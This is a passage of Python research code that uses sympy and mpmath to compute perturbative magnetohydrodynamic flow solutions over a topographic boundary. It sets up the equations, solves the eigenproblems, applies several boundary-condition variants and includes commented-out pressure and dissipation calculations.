np.amax(s) * rcond\n num = np.sum([x > tol for x in s], dtype=int)\n Q = vh[num:,:].transpose_conj()\n\n lo = Q.cols\n pa=0\n while lo != 1:\n if lo > 1:\n rcond = rcond/2\n if lo ==0:\n rcond = rcond*10\n u, s, vh = mp.svd_c(A)\n M, N = u.rows, vh.cols\n tol = np.amax(s) * rcond\n num = np.sum([x > tol for x in s], dtype=int)\n Q = vh[num:,:].transpose_conj()\n lo = Q.cols\n pa = 1\n if pa ==1 :\n print(\"precision issue, warning, rcond = \",rcond)\n\n return(Q)\n\n#Return the Taylor term of exp at order n\ndef taylor(exp,n,dic):\n expt = ((exp.xreplace(dic).doit()).taylor_term(n,e)/e**n)\n return expt\n\n#Create the Matrix from MHD equation\ndef makeMatrix(U,B,p,order,dic,vort =True):\n # if order !=0:\n\n buoy = Ri*(rho*g)\n # else:\n # r1 = rho0\n # buoy = Ri*r1*g\n Cor=((2+chi*y)*qRo*C.k).cross(U)\n BgradB = (AgradB.xreplace({Ax:B&C.i,Ay:B&C.j,Az:B&C.k,Bx:B&C.i,By:B&C.j,Bz:B&C.k})).doit()\n UgradU = (AgradB.xreplace({Ax:U&C.i,Ay:U&C.j,Az:U&C.k,Bx:U&C.i,By:U&C.j,Bz:U&C.k})).doit()\n Eq_NS = diff(U,t)+Cor+UgradU-(-gradient(p)+qRe*laplacian(U)+buoy+BgradB)\n Eq_vort=diff((Eq_NS&C.j),x)-diff((Eq_NS&C.i),y)\n Eq_m=divergence(U)\n Eq_b=diff(B,t)- (qRm*laplacian(B) + curl(U.cross(B)))\n\n if vort == True:\n eq = zeros(7,1)\n for i,j in enumerate([Eq_NS&C.i,Eq_vort,Eq_NS&C.k,Eq_b&C.i,Eq_b&C.j,Eq_b&C.k,Eq_m]):\n eq[i] = taylor(j,order,dic)\n var = [Symbol('u'+str(order)+'x'),Symbol('u'+str(order)+'y'),Symbol('u'+str(order)+'z'),Symbol('p'+str(order)),Symbol('b'+str(order)+'x'),Symbol('b'+str(order)+'y'),Symbol('b'+str(order)+'z')]\n M, rme = linear_eq_to_matrix(eq, var)\n M = simplify((M/ansatz)).xreplace(dic)\n\n print(\"Matrix OK\")\n\n return(M,rme,r1)\n\n# Return the solution vectors corresponding to the matrix of the problem\ndef eigen(M,dic,order):\n M1 = M.xreplace(dic)\n with mp.workdps(int(mp.mp.dps*2)):\n M1 = M1.evalf(mp.mp.dps)\n det =(M1).det(method = 'berkowitz')\n detp = Poly(det,kz)\n co = detp.all_coeffs()\n co = [mp.mpc(str(re(k)),str(im(k))) for k in co]\n\n maxsteps = 3000\n extraprec = 500\n ok =0\n while ok == 0:\n try:\n sol,err = mp.polyroots(co,maxsteps =maxsteps,extraprec = extraprec,error =True)\n sol = np.array(sol)\n print(\"Error on polyroots =\", err)\n ok=1\n except:\n maxsteps = int(maxsteps*2)\n extraprec = int(extraprec*1.5)\n print(\"Poly roots fail precision increased: \",maxsteps,extraprec)\n te = np.array([mp.fabs(m) < mp.mpf(10**mp.mp.dps) for m in sol])\n solr = sol[te]\n\n if Bound_nb == 1:\n solr = solr[[mp.im(m) < 0 for m in solr]]\n eigen1 = np.empty((len(solr),np.shape(M1)[0]),dtype = object)\n\n with mp.workdps(int(mp.mp.dps*2)):\n for i in range(len(solr)):\n M2 = mpmathM(M1.xreplace({kz:solr[i]}))\n eigen1[i] = null_space(M2)\n solr1 = solr\n\n div = [mp.fabs(x) for x in (order*kxl.xreplace(dic)*eigen1[:,4]+order*kyl.xreplace(dic)*eigen1[:,5]+solr1*eigen1[:,6])]\n testdivB = [mp.almosteq(x,0,10**(-(mp.mp.dps/2))) for x in div]\n eigen1 =eigen1[testdivB]\n solr1 = solr1[testdivB]\n if len(solr1) == 3:\n print(\"Inviscid semi infinite domain\")\n elif len(solr1) == 6:\n print(\"Inviscid 2 boundaries\")\n elif len(solr1) == 5:\n print(\"Viscous semi infinite domain\")\n elif len(solr1) == 10:\n print(\"Viscous 2 boundaries\")\n else:\n print(\"number of solution inconsistent,\",len(solr1))\n\n return(solr1,eigen1,M1)\n\n\ndef makedic(eig,order):\n dic = {\n Symbol('u'+str(order)+'x'):eig[0],\n Symbol('u'+str(order)+'y'):eig[1],\n Symbol('u'+str(order)+'z'):eig[2],\n Symbol('p'+str(order)):eig[3],\n Symbol('b'+str(order)+'x'):eig[4],\n Symbol('b'+str(order)+'y'):eig[5],\n Symbol('b'+str(order)+'z'):eig[6],\n }\n return(dic)\n\ndef veigen(eig,sol):\n veig=0\n for s in range(len(sol)):\n veig = veig + Symbol('C'+str(s))*eig[s]*ansatz.xreplace({kz:sol[s]})\n veig = veig/ansatz\n\n return(veig)\n\n#Surface condition of the 1st boundary\ndef surfcond(val,dic,realtopo =True ):\n if realtopo==True:\n va = val.xreplace(dic).doit().xreplace({kz:mp.sqrt(-(kxl**mp.mpf(2)+kyl**mp.mpf(2)).xreplace(dic)),f0.xreplace(dic):-(f-f0)}).xreplace(dic)\n else:\n va = val.xreplace(dic).doit().xreplace({kz:mp.sqrt(-(kxl**mp.mpf(2)+kyl**mp.mpf(2)).xreplace(dic)),f0.xreplace(dic):(-(f-f0)-conjugate(f-f0))/2}).xreplace(dic)\n return(va)\n\n#Surface condition of the 2nd boundary\ndef surfcond_2(val,dic,realtopo =True ):\n if realtopo==True:\n va = val.xreplace(dic).doit().xreplace({kz:-mp.sqrt(-(kxl**mp.mpf(2)+kyl**mp.mpf(2)).xreplace(dic)),f0_2.xreplace(dic):-(f_2-f0_2)}).xreplace(dic)\n else:\n va = val.xreplace(dic).doit().xreplace({kz:-mp.sqrt(-(kxl**mp.mpf(2)+kyl**mp.mpf(2)).xreplace(dic)),f0_2.xreplace(dic):(-(f_2-f0_2)-conjugate(f_2-f0_2))/2}).xreplace(dic)\n return(va)\n\n#Calculate tangential pressure stress\ndef pressure(p,n,dic,order):\n p= (p+conjugate(p))/2\n nz = (n&C.i)\n nre = ((nz+conjugate(nz))/2)\n nre = (series(nz,e,0,order+1).removeO())\n Fp = ((p*nre)).xreplace({conjugate(x):x,conjugate(y):y,conjugate(z):z})\n #~ Fp = surfcond(Fp,dic,realtopo=True)\n Fp = Fp.xreplace({z:topo_sum})\n Fptay = (taylor_series(Fp,0,(order*2),e)).xreplace({e:zeta}).xreplace(dic)\n # Sympy implemented series\n #~ Fptay = (series(Fp,e,0,(order*2+1)).removeO()).xreplace({e:zeta}).xreplace(dic)\n FFp = lambdify((x,y),Fptay,'mpmath')\n avFp= mp.quad(FFp, [-mp.pi, mp.pi],[-mp.pi, mp.pi],maxdegree =10)\n avFp = avFp/(4*mp.pi**2)\n return(avFp)\n\n#Calculate the strain tensor\ndef strain(U):\n xy = 1/2*(diff(U&C.i,y)+diff(U&C.j,x))\n xz = 1/2*(diff(U&C.i,z)+diff(U&C.k,x))\n yz = 1/2*(diff(U&C.j,z)+diff(U&C.k,y))\n strainT = Matrix([[diff(U&C.i,x),xy,xz],\n [xy,diff(U&C.j,y),yz],\n [xz,yz,diff(U&C.k,z)]])\n return(strainT)\n\ndef Bound(U,B,sol,eig,dic,order,condB = \"harm pot\",condU = 'Inviscid'):\n lso = len(sol)\n for s in range(len(sol)):\n globals() ['C'+str(s)] = Symbol('C'+str(s))\n #################################\n ### Inviscid solution : ###\n ### lso=3 --> 1 boundary ###\n ### lso=6 --> 2 boundaries ###\n #################################\n nn = n.xreplace(dic).doit()\n U = (U.xreplace(makedic(veigen(eig,sol),order))).xreplace({U0:1})\n B = (B.xreplace(makedic(veigen(eig,sol),order)))\n if (condB == \"harm pot\"):\n bchx,bchy,bchz = symbols(\"bchx,bchy,bchz\")\n bcc =surfcond((bchx*C.i +bchy*C.j + bchz*C.k)*ansatz - gradient(psi),dic).doit()\n sob = list(linsolve([bcc&C.i,bcc&C.j,bcc&C.k],(bchx,bchy,bchz)))[0]\n bbc = sob[0]*C.i + sob[1]*C.j + sob[2]*C.k\n bb = B.xreplace(makedic(veigen(eig,sol),order)) - (bbc*ansatz)\n Eq_b= surfcond(bb,dic)\n Eq_bx = Eq_b&C.i; Eq_by = Eq_b&C.j; Eq_bz = Eq_b&C.k\n if params.Bound_nb ==2:\n bchx2,bchy2,bchz2 = symbols(\"bchx2,bchy2,bchz2\")\n bcc2 =surfcond_2((bchx2*C.i +bchy2*C.j +bchz2*C.k)*ansatz - gradient(psi_2b),dic)\n sob2 = list(linsolve([bcc2&C.i,bcc2&C.j,bcc2&C.k],(bchx2,bchy2,bchz2)))[0]\n bbc2 = sob2[0]*C.i + sob2[1]*C.j + sob2[2]*C.k\n bb2 = B.xreplace(makedic(veigen(eig,sol),order)) - (bbc2*ansatz)\n Eq_b2= surfcond_2(bb2,dic)\n Eq_b2x = Eq_b2&C.i; Eq_b2y = Eq_b2&C.j; Eq_b2z = Eq_b2&C.k\n if (condB == \"thick\"):\n bchx,bchy,bchz,eta = symbols(\"bchx,bchy,bchz,eta\")\n kz_t = -sqrt(-kxl**2-kyl**2-I*omega/qRmm)\n # kz_t = I*1e12\n B_mant = (bchx*C.i +bchy*C.j + bchz*C.k)*ansatz.xreplace({kz:kz_t})\n\n\n eq_ind = (surfcond((diff(B_mant,t)-qRmm*laplacian(B_mant)-diff(B,t) +qRm*laplacian(B) - curl(U.cross(B))).xreplace({kz:kz_t}),dic).xreplace(dic))\n eq_E = (qRm*curl(B)-U.cross(B)-qRmm*curl(B_mant))\n eq_Et = surfcond(((nn).cross(eq_E)).xreplace({kz:kz_t}),dic)\n\n\n\n\n eq_B = surfcond(((B_mant.dot(nn)-B.dot(nn))).xreplace({kz:kz_t}),dic)\n\n un = (U.dot(nn))\n Eq_n1= surfcond((un).xreplace({kz:kz_t}),dic).xreplace(dic)\n TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,eq_ind&C.i,eq_ind&C.j,eq_ind&C.k,eq_Et.dot(tx),eq_Et.dot(ty)]]\n\n Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,bchx,bchy,bchz))\n\n\n\n\n U = (U.xreplace(makedic(veigen(eig,sol),order))).xreplace({U0:1})\n un = U.dot(nn)\n Eq_n1= surfcond(un,dic).xreplace(dic)\n\n if condU == \"Inviscid\":\n if params.Bound_nb ==2:\n nn2 = n2.xreplace(dic).doit()\n un2 = U.dot(nn2)\n Eq_n2= surfcond_2(un2,dic)\n TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,Eq_n2,Eq_bx,Eq_by,Eq_bz,Eq_b2x,Eq_b2y,Eq_b2z]]\n Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,C3,C4,C5,Symbol(\"psi\"+str(order)),Symbol(\"psi\"+str(order)+\"_2b\")))\n elif params.Bound_nb ==1:\n TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,Eq_bx,Eq_by,Eq_bz]]\n Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,Symbol(\"psi\"+str(order))))\n\n elif condU == 'noslip':\n if params.Bound_nb ==1:\n U = (U.xreplace(makedic(veigen(eig,sol),order)))\n ut1 = U.dot(tx)\n ut2 = U.dot(ty)\n Eq_BU1= surfcond(ut1,dic)\n Eq_BU2 = surfcond(ut2,dic)\n TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,Eq_BU1,Eq_BU2,Eq_bx,Eq_by,Eq_bz]]\n Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,C3,C4,Symbol(\"psi\"+str(order))))\n elif params.Bound_nb ==2:\n un1 = U.dot(tx2)\n un2 = U.dot(ty2)\n Eq2_BU1= surfcond_2(un1,dic)\n Eq2_BU2 = surfcond_2(un2,dic)\n TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,Eq_n2,Eq_BU1,Eq_BU2,Eq2_BU1,Eq2_BU2,Eq_bx,Eq_by,Eq_bz,Eq_b2x,Eq_b2y,Eq_b2z]]\n Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,C3,C4,C5,C6,C7,C8,C9,Symbol(\"psi\"+str(order)),Symbol(\"psi\"+str(order)+\"_2b\")))\n\n elif condU == 'stressfree':\n if params.Bound_nb ==1:\n eu = strain(U)*nn\n eu1 = eu*tx\n eu2 = eu*ty\n Eq_BU1 = surfcond(eu1,dic,realtopo =False)\n Eq_BU2 = surfcond(eu2,dic,realtopo =False)\n TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,Eq_BU1,Eq_BU2,Eq_bx,Eq_by,Eq_bz]]\n Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,C3,C4,Symbol(\"psi\"+str(order))))\n elif params.Bound_nb ==2:\n eu = strain(U)*nn2\n eu1 = eu*tx2\n eu2 = eu*ty2\n Eq2_BU1 = surfcond2(eu1,dic,realtopo =False)\n Eq2_BU2 = surfcond2(eu2,dic,realtopo =False)\n TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,Eq_n2,Eq_BU1,Eq_BU2,Eq2_BU1,Eq2_BU2,Eq_bx,Eq_by,Eq_bz,Eq_b2x,Eq_b2y,Eq_b2z]]\n Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,C3,C4,C5,C6,C7,C8,C9,Symbol(\"psi\"+str(order)),Symbol(\"psi\"+str(order)+\"_2b\")))\n\n Mat = Mat.evalf(mp.mp.dps)\n res = res.evalf(mp.mp.dps)\n Mat = mpmathM(Mat)\n res = mpmathM(res)\n try:\n abc = mp.qr_solve(Mat,res)[0]\n except:\n abc = mp.lu_solve(Mat,res)\n\n mantle =0 #In progress ...\n solans = zeros(7,1)\n for l in range(lso):\n solans = solans + abc[l]*Matrix(eig[l])*(ansatz).xreplace({kz:sol[l]})\n solans = solans.xreplace(dic)\n\n return(abc,solans,mantle)\n\n# Create the variable with perturbative notation\ndef makeVar():\n if i > 1:\n lon = len(eigens)\n uu = zeros(3,1);bb = zeros(3,1)\n U = U0 *u0 + e**i*(Symbol('u'+str(i)+'x')*C.i + Symbol('u'+str(i)+'y')*C.j + Symbol('u'+str(i)+'z')*C.k)*ansatz0.xreplace({kxl:i*kxl,kyl:i*kyl,omega:i*omega})\n for h in range(1,i):\n for l in range(1,lon+1):\n uu = uu + e**h*(Matrix(eigens[l-1,:3,h-1]*ansatz0).xreplace({kz:Symbol(\"k\" +str(h)+\"_\"+str(l))}).xreplace({kxl:h*kxl,kyl:h*kyl,omega:h*omega}))\n U = U + (uu[0]*C.i + uu[1]*C.j + uu[2]*C.k)+e**h*(Uparts[h])\n\n B = qAl*b0 + e**i*(Symbol('b'+str(i)+'x')*C.i + Symbol('b'+str(i)+'y')*C.j + Symbol('b'+str(i)+'z')*C.k)*ansatz0.xreplace({kxl:i*kxl,kyl:i*kyl,omega:i*omega})\n for h in range(1,i):\n for l in range(1,lon+1):\n bb = bb + e**h*(Matrix(eigens[l-1,4:,h-1]*ansatz0).xreplace({kz:Symbol(\"k\" +str(h)+\"_\"+str(l))}).xreplace({kxl:h*kxl,kyl:h*kyl,omega:h*omega}))\n B = B + (bb[0]*C.i + bb[1]*C.j + bb[2]*C.k)+e**h*Bparts[h]\n\n p = p0 + e**i*Symbol('p'+str(i))*ansatz0.xreplace({kxl:i*kxl,kyl:i*kyl,omega:i*omega})\n for h in range(1,i):\n for l in range(1,lon+1):\n p = p + e**h*(eigens[l-1,3,h-1]*ansatz0.xreplace({kz:Symbol(\"k\" +str(h)+\"_\"+str(l))}).xreplace({kxl:h*kxl,kyl:h*kyl,omega:h*omega}))\n p = p + +e**h*pparts[h]\n\n psi = psi0 + e**i*Symbol('psi'+str(i))*ansatz0.xreplace({kz:sqrt(-i*(kxl**2+kyl**2).xreplace(dico0),evaluate = False)})\n for h in range(1,i):\n psi = psi + e**h*psis[h]*ansatz0.xreplace({kz:sqrt(-h*(kxl**2+kyl**2).xreplace(dico0),evaluate = False)})\n\n if Bound_nb ==2:\n psi_2b = psi0_2b + (e**i*Symbol('psi'+str(i)+\"_2b\")*ansatz0.xreplace({kz:-sqrt(mp.mpf(str(-i*(kxl**mp.mpf(2)+kyl**mp.mpf(2)).xreplace(dico0))),evaluate =False)})).xreplace({kxl:i*kxl,kyl:i*kyl,omega:i*omega})\n for h in range(1,i):\n psi_2b = psi_2b + e**h*psis_2b[h]*ansatz0.xreplace({kz:-sqrt(mp.mpf(str(-h*(kxl**mp.mpf(2)+kyl**mp.mpf(2)).xreplace(dico0))),evaluate =False),kxl:h*kxl,kyl:h*kyl})\n\n if Bound_nb ==2:\n return(U,B,p,psi,psi_2b)\n if Bound_nb ==1:\n return(U,B,p,psi)\n\ndef subs_k(ex2,i,bnd):\n for o in range(0,i):\n for l in range(0,len(eigens)):\n ex2 = ex2.xreplace({Symbol(\"k\" +str(o+1)+\"_\"+ str(l+1)):solk[l,o]})\n return(ex2)\n\n\n#########################\n### Variables ###\n#########################\n\norder = params.order\nBound_nb = params.Bound_nb\n\nx = C.x\ny = C.y\nz = C.z\n\nde = Del()\ne,Dist = symbols(\"e,Dist\",real = True)\nRi, Ro, Al, Rm, omega, t, kx,ky,kxl,kyl, kz,rho_r,alpha, g = symbols(\"Ri Ro Al Rm omega t kx,ky,kxl,kyl,kz,rho_r,alpha, g\")\nzeta,g0,g1,buoy,a,b,c,dv,ev,fv = symbols(\"zeta,g0,g1,buoy,a,b,c,dv,ev,gv\")\nBOx,BOy,BOz = symbols(\"BOx,BOy,BOz\")\npsi0 = symbols(\"psi0\")\npsi0_2b = symbols(\"psi0_2b\")\nfor i in ['u','b']:\n for j in ['x','y','z']:\n globals() [i +'1'+j] = Symbol(i +'1'+j)\np0 = Symbol(\"p0\")\nb0x = Function(\"b0x\")(x,y,z,t);b0y = Function(\"b0y\")(x,y,z,t)\nb0z = Function(\"b0z\")(x,y,z,t);u0x = Function(\"u0x\")(x,y,z,t)\nu0y = Function(\"u0y\")(x,y,z,t);u0z = Function(\"u0z\")(x,y,z,t)\nf0 = Function(\"f0\")(x,y,z,t);f1 = Function(\"f1\")(x,y,z,t)\nf2 = Function(\"f2\")(x,y,z,t);rho0 = Function(\"rho0\")(x,y,z,t)\nf0_2 = Function(\"f0_2\")(x,y,z,t);f1_2 = Function(\"f1_2\")(x,y,z,t)\nf2_2 = Function(\"f2_2\")(x,y,z,t)\ng1 = Symbol(\"g1\");Ax = Function(\"Ax\")(x,y,z,t)\nAy = Function(\"Ay\")(x,y,z,t);Az = Function(\"Az\")(x,y,z,t)\nBx = Function(\"Bx\")(x,y,z,t);By = Function(\"By\")(x,y,z,t)\nBz = Function(\"Bz\")(x,y,z,t)\nAgradB =((Ax*D(Bx,x)+Ay*D(Bx,y)+Az*D(Bx,z))*C.i+\n(Ax*D(By,x)+Ay*D(By,y)+Az*D(By,z))*C.j\n+(Ax*D(Bz,x)+Ay*D(Bz,y)+Az*D(Bz,z))*C.k)\n\nU0,qRm,qRe,qRo,qFr,chi,qAl,qRmm = symbols(\"U0,qRm,qRe,qRo,qFr,chi,qAl,qRmm\",real = True)\n\nu0 = u0x*C.i + u0y*C.j + u0z*C.k\nb0 = b0x*C.i + b0y*C.j + b0z*C.k\n\nansatz0=exp(I*(omega*t+kxl*x+kyl*y+kz*z))\ng = -g0*C.k\nf = f0 + e*f1 #+ f2*e**2 Uncomment for smaller scales of topography\n\n# Vector normal and tangential to the topography\ndelf = de(f)\nnfo= delf/sqrt((delf&C.i)**2+(delf&C.j)**2+(delf&C.k)**2)\nnx = (nfo&C.i)\nny = (nfo&C.j)\nnz = (nfo&C.k)\n\ntfox= (C.i)+((ny/nx)*C.j)+(-((nx**2+ny**2)/(nx*nz))*C.k)\ntfox = tfox/sqrt((tfox&C.i)**2+(tfox&C.j)**2+(tfox&C.k)**2)\ntfoy= (-(ny/nx)*C.i)+(C.j)+(0*C.k)\ntfoy = tfoy/sqrt((tfoy&C.i)**2+(tfoy&C.j)**2+(tfoy&C.k)**2)\nif Bound_nb == 2:\n f_2 = f0_2 + Dist + e*f1_2\n delf2 = de(f_2)\n nfo2= -delf2/sqrt((delf2&C.i)**2+(delf2&C.j)**2+(delf2&C.k)**2)\n tfox2= ((-(delf2&C.j)*C.i)+((delf2&C.i)*C.j)+(0*C.k))\n tfox = tfox/sqrt((tfox&C.i)**2+(tfox&C.j)**2+(tfox&C.k)**2)\n tfoy2= (((delf2&C.i)*C.i)+((delf2&C.j)*C.j)+(-(((delf2&C.i)**2+(delf2&C.j)**2)/(delf2&C.k))*C.j))\n tfoy = tfoy/sqrt((tfoy&C.i)**2+(tfoy&C.j)**2+(tfoy&C.k)**2)\n\n\n######################\n### SCRIPT ###\n######################\n#Parameters chosen for calculation\ndico0 = params.dom\ndico1 = params.dom1\n# if dico1['qRe'] != 0 and condU =='Inviscid':\n# print(\"error Inviscid fluid incompatible with qRe != 0\")\nprint(dico1)\n\nlenvar = 1\nPress = np.zeros((4,lenvar), dtype = np.complex)\n\n#Choose what parameter you want to vary\nfor K,eta in enumerate(mp.linspace(-1,4,lenvar)):\n saveO = zeros(7,1) # save variable for speed, pressure and magnetic field (7 scalar)\n saveO_m = 0*C.i # magnetic field for the mantle part\n KXs = params.KXs\n KYs = params.KYs\n\n # Create the total topography and its normal vector\n topo_sum =0\n for kxx,kyy in zip(KXs,KYs):\n topo_sum += e*(zeta*(exp(I*(kxx*x+kyy*y))))/len(KXs)\n delfsum = de(z-topo_sum)\n nsum = delfsum/sqrt((delfsum&C.i)**2+(delfsum&C.j)**2+(delfsum&C.k)**2)\n nsum = nsum.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1})\n\n # Calculus for each Fourier component of the topography\n for KX,KY in zip(KXs,KYs):\n Usopart = 0\n solfull = 0\n so_part = zeros(7,1)\n psis = [0]\n psis_2b = [0]\n rhos = [0]\n Uparts = [0*C.i +0*C.j +0*C.k]\n Bparts = [0*C.i +0*C.j +0*C.k]\n pparts = [0]\n Usopart = 0*C.i +0*C.j +0*C.k\n Bsopart=0*C.i +0*C.j +0*C.k\n psopart = 0\n dico0[kyl] = KY # x wavenumber\n dico0[kxl] = KX # y wavenumber\n\n n = nfo.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1}) # normal vector\n tx = tfox.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1}) # 1st tangential vector\n ty = tfoy.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1}) # 2nd tangential vector\n\n # same for the 2nd boundary\n if Bound_nb == 2:\n n2 = nfo2.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1})\n tx2 = tfox2.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1})\n ty2 = tfoy2.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1})\n\n # Calculus for each order i\n for i in range(1,order+1):\n print(\"ORDER\",i)\n\n if Bound_nb ==2:\n U,B,p,psi,psi_2b = makeVar()\n if Bound_nb ==1:\n U,B,p,psi = makeVar()\n\n # Solve the mass conservation equation\n if i ==1:\n rho= rho0.xreplace({**dico0,**dico1})\n rho = rho + e**i*Symbol('rho'+str(i))*ansatz0.xreplace({kxl:i*kxl,kyl:i*kyl,omega:i*omega})\n print(rho)\n Eq_rho = diff(rho,t)+ U.dot(gradient(rho))\n print(Eq_rho)\n Eq_rho1 = taylor(Eq_rho,i,{**dico0,**dico1})\n print(Eq_rho1)\n r1 = list(solveset(Eq_rho1,Symbol('rho'+str(i))))[0]\n rho = rho.xreplace({Symbol('rho'+str(i)):r1})\n \n\n ansatz = (exp(I*(i*omega*t+i*kxl*x+i*kyl*y+kz*z))).xreplace({**dico0,**dico1})\n\n ### TEST OF ORDER0 ###\n # print(\"we test the order 0...\")\n # M0,rme0,r10 = makeMatrix(U0 *u0,qAl*b0,p0,0,{**dico0,**dico1},vort=True)\n # print(rme0.xreplace({**dico0,**dico1}))\n\n M,rme,r1 = makeMatrix(U,B,p,i,{**dico0,**dico1},vort=True)\n M = M.xreplace({y:0})\n\n if i > 1:\n print(\"Particular solution\")\n rmec = expand(rme)\n\n s= (expand(rmec[0])).args\n\n expo = []\n for st in s:\n stt = str(st)\n start = stt.find('exp')\n expo = np.append(expo,stt[start:])\n expo = np.unique(expo)\n so_part = zeros(7,1)\n for ex in expo:\n print(ex)\n loc_dict = {'C':C}\n ex = parse_expr(ex,local_dict = loc_dict)\n\n coe = lambda x: x.coeff(ex)\n\n rmep = (rmec).applyfunc(coe)\n nwkz = simplify((log(ex).expand(force=True)/I).xreplace({x:0,y:0,t:0,z:1}))\n Mp = simplify(M.xreplace({kz:nwkz}))\n\n rmep = subs_k(rmep,i,Bound_nb)\n Mp = subs_k(Mp,i,Bound_nb)\n with mp.workdps(int(mp.mp.dps*2)):\n\n Mp = mpmathM(Mp)\n rmep = mpmathM(rmep)\n\n try:\n soluchap = mp.qr_solve(Mp,rmep)[0]\n except:\n soluchap = mp.lu_solve(Mp,rmep)\n print('QR decomposition failed LU used')\n\n sop = Matrix(soluchap)*ex\n so_part = so_part+sop\n\n\n with mp.workdps(int(mp.mp.dps*2)):\n so_part = so_part.xreplace({**dico0,**dico1})\n Usopart = so_part[0]*C.i + so_part[1]*C.j + so_part[2]*C.k\n Bsopart = so_part[4]*C.i + so_part[5]*C.j + so_part[6]*C.k\n psopart = so_part[3]\n\n Ubnd = U + e**i*Usopart\n Bbnd = B + e**i*Bsopart\n pbnd = p + e**i*psopart\n\n Ubnd = subs_k(Ubnd,i,Bound_nb)\n Bbnd = subs_k(Bbnd,i,Bound_nb)\n pbnd = subs_k(pbnd,i,Bound_nb)\n\n ###### Homogeneous solution #######\n\n print(\"Homogeneous solution\")\n\n\n\n sol,eig,M1 = eigen(M,{**dico0,**dico1},i)\n #~ print(sol)\n if i == 1:\n Ubnd = U\n Bbnd = B\n eigens= np.zeros((len(sol),7,order),dtype = object)\n solk= np.zeros((len(sol),order),dtype = object)\n # print(\"res Eigens\")\n # for s in range(len(eig)):\n # print(max(np.array(M.xreplace({kz:sol[s]}).dot(eig[s]),dtype = np.complex)))\n abc,solhom,mantle = Bound(Ubnd,Bbnd,sol,eig,{**dico0,**dico1},i)\n\n for ei in range(len(sol)):\n eigens[ei,:,i-1] = abc[ei] * eig[ei]\n solk[:,i-1] = sol\n if Bound_nb == 1:\n psis.append(abc[-1])\n if Bound_nb ==2:\n psis.append(abc[-2])\n psis_2b.append(abc[-1])\n\n\n\n\n Uparts.append(Usopart)\n Bparts.append(Bsopart)\n pparts.append(psopart)\n solfull = so_part +solhom\n\n print(\"Finish\")\n #######################\n ### Final fields ###\n #######################\n save = solfull\n save = subs_k(save,i,Bound_nb)\n saveO = saveO+(save*e**i).xreplace({**dico0,**dico1})\n\n # saveO_m= saveO_m+e*((abc[3]*C.i+abc[4]*C.j+abc[5]*C.k)*ansatz.xreplace({kz:-sqrt(-kxl**2-kyl**2-I*omega/qRmm)})).xreplace({**dico0,**dico1})\n #saveO_m= saveO_m+e*((abc[3]*C.i+abc[4]*C.j+abc[5]*C.k)*ansatz.xreplace({kz:I*1e12})).xreplace({**dico0,**dico1})\n ####################\n ### PRESSURE ###\n ####################\n # Eb = dico1[BOx]*C.i+dico1[BOy]*C.j+dico1[BOz]*C.k\n # Bf = saveO[4]*C.i+saveO[5]*C.j+saveO[6]*C.k\n # PM = 1/2*((Eb*qAl+Bf).dot(Eb*qAl+Bf))\n #\n # avFp = (pressure(saveO[3],nsum,{**dico0,**dico1},1))\n # avPM = (pressure(PM,nsum,{**dico0,**dico1},1))\n # ft = mp.re(avFp-avPM)\n # print(ft)\n\n #######################\n ### Dissipation ###\n #######################\n # sm = 1000\n # sf =5e5\n # h_b = 100\n # V_b = mp.mpf('4e-5')\n # Om_b = mp.mpf('7.292e-5')\n # sig_b = (mp.mpf('1.00232')+1j*mp.mpf('2.5')*mp.mpf(1e-5))\n # L_b = 1e5\n # mu_b = 4*mp.pi*mp.mpf('1e-7')\n # rho_b = mp.mpf('1e4')\n # B_b = mp.mpf('5e-4')\n # N_b = mp.mpf('0.09')\n #\n #\n # b_f = ((saveO[4])*C.i+(saveO[5])*C.j+(saveO[6])*C.k)*mp.sqrt(rho_b*mu_b)*V_b\n # b_m = saveO_m*mp.sqrt(rho_b*mu_b)*V_b\n #\n # b_f = ((((b_f&C.i)+conjugate(b_f&C.i))*C.i + ((b_f&C.j)+conjugate(b_f&C.j))*C.j + ((b_f&C.k)+conjugate(b_f&C.k))*C.k)/2).xreplace({conjugate(x):x,conjugate(y):y,conjugate(z):z,conjugate(t):t})\n #\n # b_m = ((((b_m&C.i)+conjugate(b_m&C.i))*C.i + ((b_m&C.j)+conjugate(b_m&C.j))*C.j + ((b_m&C.k)+conjugate(b_m&C.k))*C.k)/2).xreplace({conjugate(x):x,conjugate(y):y,conjugate(z):z,conjugate(t):t})\n #\n # j_f = curl(b_f)/mu_b\n # j_m = curl(b_m)/mu_b\n #\n # Diss_f = 2*((j_f&C.i*conjugate(j_f&C.i))+(j_f&C.j*conjugate(j_f&C.j))+(j_f&C.k*conjugate(j_f&C.k)))/sf\n # Diss_m = 2*((j_m&C.i*conjugate(j_m&C.i))+(j_m&C.j*conjugate(j_m&C.j))+(j_m&C.k*conjugate(j_m&C.k)))/sm\n #\n # Fptay_f = (series(Diss_f,e,0,3).removeO()).xreplace({e:zeta,x:0,y:0,t:0}).xreplace(dico1)\n # Fptay_m =(series(Diss_m,e,0,3).removeO()).xreplace({e:zeta,x:0,y:0,t:0}).xreplace(dico1)\n #\n #\n # FFp_f = lambdify(z,Fptay_f,'mpmath')\n # FFp_m = lambdify(z,Fptay_m,'mpmath')\n # print('integrate')\n #\n # avFp_f= 